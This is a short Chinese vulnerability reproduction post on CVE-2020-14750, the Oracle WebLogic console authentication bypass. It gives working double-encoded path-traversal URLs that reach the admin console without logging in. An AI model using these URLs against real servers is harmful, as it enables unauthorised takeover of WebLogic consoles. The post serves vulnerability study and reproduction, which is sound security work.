WebLogic权限绕过(CVE-2020-14750)

2023-12-29 06:26:53

漏洞描述:

Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞是CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。

复现过程:

1.访问

?http://ip:port/console/login/LoginForm.jsp

2.Edge浏览器绕过登陆的url

3.访问如下链接,火狐浏览器或者谷歌浏览器可以绕过登录

http://ip:port/console/css/%252e%252e%252fconsole.portal
http://ip:port/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29?

也可以绕过登录

文章来源:https://blog.csdn.net/m0_65150886/article/details/135269413
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。